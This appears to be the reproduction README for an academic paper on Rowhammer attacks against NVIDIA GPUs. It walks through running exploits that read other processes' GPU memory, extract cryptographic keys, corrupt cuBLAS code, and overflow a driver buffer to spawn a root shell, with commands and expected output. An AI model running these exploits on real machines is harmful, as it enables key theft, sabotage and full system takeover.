This is the code artifact for the paper "GPUBreach: Privilege Escalation Attacks on GPUs using Rowhammer", to be presented at IEEE Security & Privacy (Oakland) 2026
Authors: Chris S. Lin, Yuqin Yan, Joyce Qu, Joseph Zhu, Guozhen Ding, David Lie, Gururaj Saileshwar. University of Toronto
In this artifact, we aim to reproduce the following:
- PT Massaging Primitives (Figures 5, 7, 8, and 10)
- GPU Privilege Escalation - Arbitrary Read & Write Capabilities with GPUBreach (Table 2, Sections 6.1 - 6.3, Table 3)
- CPU Privilege Escalation - End-to-End GPU-CPU Exploit (Section 6.4)
All the results are generated automatically except the CPU Privilege Escalation exploit, which has an interactive component (more details below).
Please see src/README.md for additional usage/implementation details.
Run-time Environment: We suggest using a Linux distribution compatible with g++-11 or newer.
Software Dependencies:
- CMake 3.22+
- g++ with C++17 Support
- NVIDIA CUDA Driver: 580.95.05
- NVIDIA CUDA Toolkit
- NVIDIA System Management Interface (nvidia-smi)
- Python 3.10+
Hardware Dependencies:
- NVIDIA GPU sm_80+
Our reference system:
- OS: Ubuntu 22.04.5 LTS
- CPU: AMD Ryzen Threadripper PRO 5945WX 12-Cores
- GPU: NVIDIA RTX A6000 (48 GB GDDR6, sm_80)
- Driver: NVIDIA Driver 580.95.05 (includes nvidia-smi)
- CUDA Toolkit: 12.8
- Compiler: g++ 10.5.0
Ensure you have already cloned the repository:
git clone https://github.com/sith-lab/gpubreach.git
cd gpubreach

Our profiling results require the set of tools developed in the gpu-tlb repository, which is included in our artifact. Patching the NVIDIA driver with the modifications from gpu-tlb works as follows (this step can be skipped for AE, as we have the patched driver set up on our local GPU):
cd gpubreach
wget https://us.download.nvidia.com/XFree86/Linux-x86_64/580.95.05/NVIDIA-Linux-x86_64-580.95.05.run
chmod +x NVIDIA-Linux-x86_64-580.95.05.run
./NVIDIA-Linux-x86_64-580.95.05.run -x
cd NVIDIA-Linux-x86_64-580.95.05/
# This patch works for our version as well.
patch -p1 < ../gpu-tlb/dumper/patch/driver-570.133.07.patch

Now use the installer to install the driver. Please select the MIT/GPL installation and choose the default options.
sudo ./nvidia-installer

Afterward, run the following to build the relevant dumpers:
cd ../ # goes back to gpubreach
bash run_make_dumpers.sh

For the Rowhammer attack, a prerequisite is having ECC disabled. We observe that this is the default setting for A6000 GPUs on many cloud providers. If it is enabled, use the following commands to disable it (we have already done this on our local GPU, so you can skip this step for AE):
# No need to do this for AE.
sudo nvidia-smi -e 0
sudo rmmod nvidia_drm
sudo rmmod nvidia_modeset
sudo reboot

Our profiling is easier with persistence mode enabled and with fixed GPU and memory clock rates, although these are not prerequisites. The following script performs these actions:
# Example usage:
# bash ./gpuhammer/util/init_cuda.sh <MAX_GPU_CLOCK> <MAX_MEMORY_CLOCK>
cd gpubreach
bash gpuhammer/util/init_cuda.sh 1800 7600

MAX_GPU_CLOCK and MAX_MEMORY_CLOCK can be found with deviceQuery from the CUDA samples. We provide this output for the A6000 in gpuhammer/src/deviceQuery.txt.
These changes can be undone with bash gpuhammer/util/reset_cuda.sh.
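For orientation, pinning GPU state for profiling typically boils down to a handful of nvidia-smi invocations. The sketch below is ours, not the artifact's: it only prints the commands it would run, assuming the standard nvidia-smi flags for persistence mode (-pm) and clock locking (-lgc/-lmc). Consult gpuhammer/util/init_cuda.sh for what the artifact actually executes.

```python
# Sketch (ours): print the nvidia-smi commands that pin GPU state for
# profiling. Flag names -pm/-lgc/-lmc are the standard nvidia-smi options for
# persistence mode and GPU/memory clock locking; the artifact's real logic
# lives in gpuhammer/util/init_cuda.sh.
def init_cuda_commands(max_gpu_clock: int, max_mem_clock: int) -> list[str]:
    return [
        "sudo nvidia-smi -pm 1",                                  # persistence mode on
        f"sudo nvidia-smi -lgc {max_gpu_clock},{max_gpu_clock}",  # lock GPU clock
        f"sudo nvidia-smi -lmc {max_mem_clock},{max_mem_clock}",  # lock memory clock
    ]

if __name__ == "__main__":
    # Dry run with the A6000 values used above.
    for cmd in init_cuda_commands(1800, 7600):
        print(cmd)
```

Running this only prints the commands; pipe them to a shell (or run init_cuda.sh directly) to apply them.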
Our artifact requires the ImageNet 2012 Validation Dataset, which is available from the official ImageNet website. Please note that downloading requires a (free) ImageNet account — please register at https://www.image-net.org/download-images.php before proceeding.
We require the "Validation images (all tasks)" under Images when inside the ImageNet 2012 DataSet webpage. Please obtain the download link and download it to the repository root as follows:
# Make sure you are downloading the file into the repository root directory
cd gpubreach
wget <download link>

The downloaded file's name should be ILSVRC2012_img_val.tar.
Run the following commands to set up environment variables, install dependencies, and build GPUBreach.
Important: You should either run source ./init_env.sh for every terminal or add the exports to .bashrc.
cd gpubreach
source ./init_env.sh

Afterwards, run:
bash ./run_auto_artifacts.sh

./run_auto_artifacts.sh runs the parts of the artifact that can be run non-interactively. This includes the PT Region Massaging experiments (Figures 5, 7, 8, 10) and the demonstration of GPU-side privilege escalation in Sections 6.1 - 6.3. For ease of reproducibility, we use one of the bit flips already discovered in Table 2 (A1) for all these attacks.
For PT Massaging Primitives, ./run_auto_artifacts.sh will run the following steps to generate the results:
bash run_fig5.sh # (~30 minutes) ; Page types used with different allocation sizes.
bash run_fig7.sh # (<1 minute) ; UVM eviction side-channel to identify when memory is full.
bash run_fig8.sh # (<1 minute) ; UVM eviction side-channel when the PT region is allocated with the memory.
bash run_fig10.sh # (<1 minute) ; UVM eviction side-channel using 4KB pages.

The results will be stored in results/.
NOTE: We additionally provide sample outputs of all experiments in the folder
./results/sample.
Reproduced with bash run_fig5.sh. It iteratively tries different allocation sizes and extracts the data page sizes used, via the gpu-tlb dumper. The result is reproduced successfully if the output PDF shows 4KB pages used for allocations greater than 2MB, using ./results/sample/fig5.pdf as a reference.
Reproduced with bash run_fig7.sh. The result is reproduced successfully if the output PDF shows timing spikes of ~0.2ms after ~24000 allocations, using ./results/sample/fig7.pdf as a reference. The timing may look slightly different from our paper due to a more recent driver used for our artifact.
Reproduced with bash run_fig8.sh. The result is reproduced successfully if the output PDF shows a timing spike for leaving 2MB freed but none for leaving 4MB free, using ./results/sample/fig8.pdf as reference.
Reproduced with bash run_fig10.sh. The result is reproduced successfully if the output PDF shows consistent timing spikes every 508 allocations, using ./results/sample/fig10.pdf as a reference.
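The eviction side-channel signal in Figures 7, 8, and 10 reduces to "allocation latency spikes above a quiet baseline". As a sanity check independent of the plotting scripts, a trace can be screened programmatically; the sketch below is our illustration (the per-allocation timing format is an assumption, not the artifact's actual output format):

```python
# Sketch (ours): flag timing spikes in a per-allocation latency trace, as a
# stand-in for eyeballing the Fig 7/8/10 PDFs. Input format is hypothetical.
from statistics import median

def find_spikes(latencies_ms, factor=10.0):
    """Return indices whose latency exceeds `factor` x the median latency."""
    base = median(latencies_ms)
    return [i for i, t in enumerate(latencies_ms) if t > factor * base]

if __name__ == "__main__":
    # Synthetic trace: ~0.001 ms baseline with ~0.2 ms spikes every 508
    # allocations, mimicking the 4KB-page pattern described for Figure 10.
    trace = [0.2 if i % 508 == 507 else 0.001 for i in range(2032)]
    print(find_spikes(trace))  # [507, 1015, 1523, 2031]
```

A median-relative threshold is used so the check is robust to absolute timing differences across driver versions, which the Figure 7 note above warns about.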
./run_auto_artifacts.sh also runs the parts of the artifact that demonstrate the GPU-side privilege escalation (exploits in Sections 6.1-6.3). It runs the scripts shown below, reproducing the known vulnerable bit flips (Table 2) and using one of them (A1 in Table 2) for the subsequent experiments.
bash run_t2.sh # (<10 minutes) ; Hammers the known vulnerable bit-flip positions used in the paper, to reproduce Table 2.
bash run_gpubreach_demo.sh # (<5 minutes) ; Runs the exploit and reads/modifies another process's data in GPU memory.
## The privilege escalation takes ~17 seconds; the rest of the time is spent on memory dumping for the demonstration.
bash run_cupqc_exploit.sh # (<1 hour) ; Runs the exploit, then locates the memory used by victim cuPQC kernels and extracts the secret keys.
bash run_ml_exploit.sh # (<10 minutes) ; Runs the exploit, then modifies a cuBLAS branch through the known vulnerable cuBLAS SASS template, which degrades model accuracy universally.

Note 1: Other than run_t2.sh, the scripts spawn detached background processes, which must be killed manually if you terminate the exploit scripts early.
Note 2: There is a very low probability of the exploit chain crashing the attacker program, in which case you can simply re-run the exploit bash script once everything is killed or, if necessary, reboot or power cycle as described in Debugging Tips.
With bash run_t2.sh, we run GPUHammer to reproduce the bit flips in Table 2. All of these are at locations suitable for our GPU page table tampering.
Table 2 is reproduced successfully if the results in results/t2/t2.txt overlap with Table 2 in the paper. Note that not all flips may be reproduced every time, due to the temporal randomness of Rowhammer.
With bash run_gpubreach_demo.sh, the GPUBreach exploit chain runs automatically on our GPU and achieves GPU privilege escalation, gaining arbitrary read/write privilege on GPU memory. These privileges are demonstrated by showing that we can read and modify another program's data in the GPU memory. Once this is achieved, exploits in Sections 6.2 and 6.3 can be executed.
In this demonstration, a victim program from ./data_scripts/gpubreach_demo/sample_app.cu is run and its memory is initialized to 0xdeadbeefabcdabcd.
GPU privilege escalation is successful if the results in results/gpubreach_demo/memdump.txt show that the memory dumped by GPUBreach contains 0xdeadbeefabcdabcd, and the results/gpubreach_demo/app.out shows "Modified. Exiting" which indicates this memory was also modified by GPUBreach.
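The success check above can also be done programmatically. The helper below is ours, not part of the artifact: it scans a dump file for the 0xdeadbeefabcdabcd marker, and since the dump format is not specified here, it tries both the ASCII hex rendering and the raw little-endian byte encoding.

```python
# Sketch (ours): check a GPUBreach memory dump for the victim's
# 0xdeadbeefabcdabcd marker. Dump format is not assumed: both the ASCII hex
# rendering and the raw little-endian encoding are searched.
MARKER = 0xDEADBEEFABCDABCD

def contains_marker(path: str) -> bool:
    data = open(path, "rb").read()
    return (b"deadbeefabcdabcd" in data.lower()
            or MARKER.to_bytes(8, "little") in data)

if __name__ == "__main__":
    # Demo with a synthetic dump; point `path` at
    # results/gpubreach_demo/memdump.txt for the real check.
    import tempfile
    with tempfile.NamedTemporaryFile(delete=False) as f:
        f.write(b"0x7f00: deadbeefabcdabcd\n")
    print(contains_marker(f.name))  # True
```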
With bash run_cupqc_exploit.sh, after GPU privilege-escalation, the attacker attempts to locate memory used by the victim by exploiting the cudaFree/Alloc() memory-zeroing behaviour. Then, it will rapidly dump out the candidate victim pages found, looking for secret keys.
In this demonstration, a victim program from ./data_scripts/cupqc_exploit/keyexchange_victim.cu is run repeatedly every 2 seconds. Each time, the attacker probes each candidate page and dumps the content.
The attack is successful if the results in results/cupqc_exploit/cupqc.txt show that one of the candidate pages was dumped successfully with the expected secret key value.
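The final filtering step, scanning dumped candidate pages for the expected secret-key value, can be sketched as follows. This is our illustration only: the 4KB page granularity, the raw-bytes dump input, and the stand-in key pattern are all assumptions, not the artifact's actual data layout.

```python
# Sketch (ours): scan dumped candidate pages for an expected byte pattern
# (in the demo, the known secret-key value). Page size and raw-dump input
# are assumptions for illustration.
PAGE = 4096  # assumed page granularity

def pages_containing(dump: bytes, pattern: bytes):
    """Yield indices of PAGE-sized chunks of `dump` that contain `pattern`."""
    for i in range(0, len(dump), PAGE):
        if pattern in dump[i:i + PAGE]:
            yield i // PAGE

if __name__ == "__main__":
    key = b"\x13\x37" * 16  # hypothetical stand-in for the demo key
    dump = bytes(PAGE) + bytes(2048) + key + bytes(2048 - len(key)) + bytes(PAGE)
    print(list(pages_containing(dump, key)))  # [1]
```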
With bash run_ml_exploit.sh, after GPU privilege-escalation, the attacker looks for a known vulnerable cuBLAS template in GPU memory and corrupts the vulnerable branch.
In this demonstration, a victim program from ./data_scripts/ml_exploit/run_imagenet_models.py is run. Once the PyTorch cuBLAS code is loaded into the GPU code segment, the attacker corrupts the target branch during its idle time, resulting in universally degraded accuracy across all models.
The attack is successful if the results in results/ml_exploit/t3.txt show similar degradation and performance impact as Table 3 in the paper.
This exploit starts from user space on the GPU and achieves an arbitrary write primitive into the CPU's kernel memory, even with IOMMU protection enabled. The attacker first tampers with GPU driver metadata in CPU memory via DMA from the GPU (a region the IOMMU permits the GPU to access). When the GPU driver consumes this tampered data, it triggers a buffer overflow that overwrites an adjacent buffer in the GPU driver containing kernel memory pointers. This yields an arbitrary write primitive over the entire kernel memory: the attacker uses it to overwrite the euid of the current process with 0, and thus spawns a root shell.
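To make the final write concrete: the arbitrary kernel write targets the euid field inside the process's struct cred. The ctypes sketch below is entirely illustrative; the field layout is a simplified stand-in, since the real struct cred layout depends on the kernel version and configuration and must be taken from the running kernel.

```python
# Sketch (ours): simulate "arbitrary write of euid = 0" against a MOCK struct
# cred. WARNING: this layout is a simplified stand-in, NOT the real kernel
# layout; offsets differ across kernel versions and configs.
import ctypes

class MockCred(ctypes.Structure):
    _fields_ = [
        ("usage", ctypes.c_int),   # refcount
        ("uid",   ctypes.c_uint),  # real UID
        ("gid",   ctypes.c_uint),
        ("suid",  ctypes.c_uint),
        ("sgid",  ctypes.c_uint),
        ("euid",  ctypes.c_uint),  # effective UID -- the write target
        ("egid",  ctypes.c_uint),
    ]

def escalate(cred: MockCred) -> None:
    """Arbitrary-write primitive: zero 4 bytes at &cred + offsetof(euid)."""
    off = MockCred.euid.offset
    ctypes.memset(ctypes.addressof(cred) + off, 0, ctypes.sizeof(ctypes.c_uint))

if __name__ == "__main__":
    cred = MockCred(usage=1, uid=1000, gid=1000, suid=1000,
                    sgid=1000, euid=1000, egid=1000)
    escalate(cred)
    print(cred.euid, cred.uid)  # 0 1000
```

Note how only euid changes: the real UID stays 1000, matching the whoami output shown in Step 2 below.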
Our evaluation has the following CPU-side configuration:
Architecture: x86_64
CPU op-mode(s): 32-bit, 64-bit
Address sizes: 48 bits physical, 48 bits virtual
Byte Order: Little Endian
CPU(s): 24
On-line CPU(s) list: 0-23
Vendor ID: AuthenticAMD
Model name: AMD Ryzen Threadripper PRO 5945WX 12-Cores
CPU family: 25
Model: 8
Thread(s) per core: 2
Core(s) per socket: 12
Socket(s): 1
Stepping: 2
NUMA:
NUMA node(s): 1
NUMA node0 CPU(s): 0-23
Dump the Cred Structure Address
This step obtains the address of the cred structure, based on the exploit's assumption that the address of a process's cred data structure can be leaked via other side channels.
$ cd gpubreach/cred_mod/
$ make
$ sudo insmod get_cred_addr.ko

Build CPU-side exploit
Next, we build the CPU-side exploit components. We also generate a file d_pattern.bin containing a 1GB data pattern of repeating 0x64 bytes, which will be placed in GPU memory. This pattern is used to identify the PA of a VA we control, and the associated PTE, which we will eventually redirect to the IOVA region.
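Based on the description above, a minimal sketch of what create_d_pattern.py produces is simply a file of repeating 0x64 bytes; the chunked writing below is our choice to avoid holding 1GB in memory. The artifact's own script is the authoritative version.

```python
# Sketch (ours): write a file of repeating 0x64 bytes, mirroring the
# behaviour described for create_d_pattern.py. Chunked so a 1GB file does
# not require 1GB of RAM.
def write_pattern(path: str, size: int, byte: int = 0x64,
                  chunk: int = 1 << 20) -> None:
    block = bytes([byte]) * chunk
    with open(path, "wb") as f:
        written = 0
        while written < size:
            n = min(chunk, size - written)
            f.write(block[:n])
            written += n

if __name__ == "__main__":
    import os, tempfile
    path = os.path.join(tempfile.gettempdir(), "d_pattern_small.bin")
    write_pattern(path, 4096)  # small demo; use 1 << 30 for the real 1GB file
    print(open(path, "rb").read(8).hex())  # 6464646464646464
```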
$ cd gpubreach/d2h-tools/
$ ./create_d_pattern.py --size 1GB --output d_pattern.bin
$ cd cpu-exploit/
$ make -j

This step performs the GPU-side privilege escalation and finds the candidate PTE of a VA we control, in order to redirect its translation to point to an IOVA.
First, we execute the GPUBreach program designed for this exploit.
$ cd gpubreach
$ python3 gpubreach.py app_cpu_exploit --n_step1 24109 -t 0.2 -s 15 -c "$BREACH_ROOT/flip_config_sample/FLIP_LEFT_TMPL.ini"

Note: -c specifies the bit-flip configuration file for A1. See src/README.md for more details.
When corruption is successful, the program will pause, and you will see the following text:
(Stable Primitive Ready) Start cpu-exploit now. It should load its page with 0x6464646464646464.
Press Enter Key to start finding and modifying that page's PTE.
Next, we locate the PTE that we need to tamper with to access the IOVA.
On a second terminal, please execute the following, which first loads the attacker memory with 0x6464646464646464:
$ cd gpubreach/d2h-tools
$ ./cpu-exploit/cpu-exploit ./d_pattern.bin

Once this opens a new terminal, the data has been loaded. Now go back to GPUBreach's terminal (the first terminal) and press the Enter key. On success, GPUBreach prints the text below:
Found its PTE, modified your pointer's PTE to point to: 0x060000000fff0005
Press Enter Key if you want to write 0x060000000ffe0005 instead.
Note that the GPU's IOVA value is stable across runs and machines: it is always 0xffe41000 or 0xfff41000. Unfortunately, we do not know which one is used on each bootup, so the attack may fail. You may choose whether to write 0x060000000fff0005 or 0x060000000ffe0005 by following the instructions in the GPUBreach output.
Now you are ready to move on to Step 2.
In the command prompt that was opened using ./cpu-exploit (second terminal above), run the following application commands step by step. Note that > means that these commands are run in the exploit's command prompt, not the regular shell.
> poc-init # Initializes the base of the buffer under operation by scanning the memory.
> poc-cw-entry0-checksum # Scans the slots, discovers the current sequence numbers, and infers the next few sequence numbers that will be used. It then generates a payload, with a correct checksum, indicating that 16 more messages follow it, and writes them to the next entries, which the PoC predicts the GPU driver will consume.
> poc-privesc # Constructs the 17-entry message that will overflow the buffer, and then overwrites the GSP's message queue in the driver.
> poc-trigger 1 # Starts a thread that continuously sends GPU queries.

You can now return to the exploit's command prompt and check your privileges:
> whoami

Expected output:
User identity check:
Real UID: 1000 (your original UID; may differ on your system)
Effective UID: 0
The effective UID of 0 indicates successful privilege escalation to root.
If the Effective UID is not 0, the exploit has failed. You can try executing poc-trigger 5. If still unsuccessful, you may need to reboot the machine using out-of-band methods and restart the exploit.
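To illustrate the shape of what poc-cw-entry0-checksum and poc-privesc construct, here is a toy model in Python. It deliberately does not model the real GSP message format, which is not reproduced here; the field names, the additive checksum, and the entry layout are all hypothetical, and only the mechanism described above (predict the next sequence numbers, then emit a 17-entry payload whose first entry claims 16 more messages follow, each with a valid checksum) is taken from the text.

```python
# Toy model ONLY: the real GSP message-queue format is NOT modelled here.
# Illustrates "predict next sequence numbers, then emit 17 entries whose
# first entry claims 16 followers, each with a valid checksum".
def checksum(words):
    """Hypothetical additive checksum over 32-bit words."""
    return sum(words) & 0xFFFFFFFF

def build_payload(last_seq: int, n_entries: int = 17):
    """Build n_entries entries at the predicted next sequence numbers."""
    entries = []
    for k in range(n_entries):
        seq = last_seq + 1 + k            # predicted next sequence number
        body = [0x64] * 4                 # placeholder message body
        remaining = n_entries - 1 - k     # entry 0 claims 16 more follow
        hdr = [seq, remaining]
        entries.append(hdr + body + [checksum(hdr + body)])
    return entries

if __name__ == "__main__":
    payload = build_payload(last_seq=41)
    print(len(payload), payload[0][1])  # 17 16
```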
If the previous step has succeeded, use the fork command to spawn a root shell:
> fork

Expected output:
In child process (PID: XXXX)
Effective UID: 0
# whoami
root
# id
uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),114(lpadmin)
You now have a root shell despite starting as a regular user.
To reproduce only the driver-side vulnerability and the CPU privilege escalation, you can simulate the GPU-side privilege escalation with the gpu-tlb dumper instead of GPUBreach. This is useful because the bit flips can sometimes disappear for a while, especially after power cycling the machine (see Debugging Tips).
In one terminal, we execute:
$ cd gpubreach/d2h-tools
$ ./cpu-exploit/cpu-exploit ./d_pattern.bin # Run this command as-is, as a regular user with GPU access (non-root).

Instead of using GPUBreach, we simulate the arbitrary RW with the simulate_rowhammer.sh script. Modify IOVA_BASE in simulate_rowhammer.sh to 0xfff00000 or 0xffe00000.
In another terminal, we execute:
$ cd d2h-tools/gpu_mem_dumper/scripts/
$ sudo bash ./simulate_rowhammer.sh

Now you can go back to Step 2 above.
After an out-of-band restart, we notice that bit flips disappear for a while, likely due to voltage changes. Whenever such a restart happens, run the following to check for the bit flip:
cd gpubreach
source ./init_env.sh # Not needed if already run before
bash run_regenerate_a1.sh
It will iteratively hammer and check whether the bit flip has reappeared. Unfortunately, exactly when it reappears is variable (sometimes it takes a few minutes). You may choose to wait a few hours before restarting the process. For the CPU-GPU exploit, you may also use Alternative Step 1, given that we have already demonstrated arbitrary RW.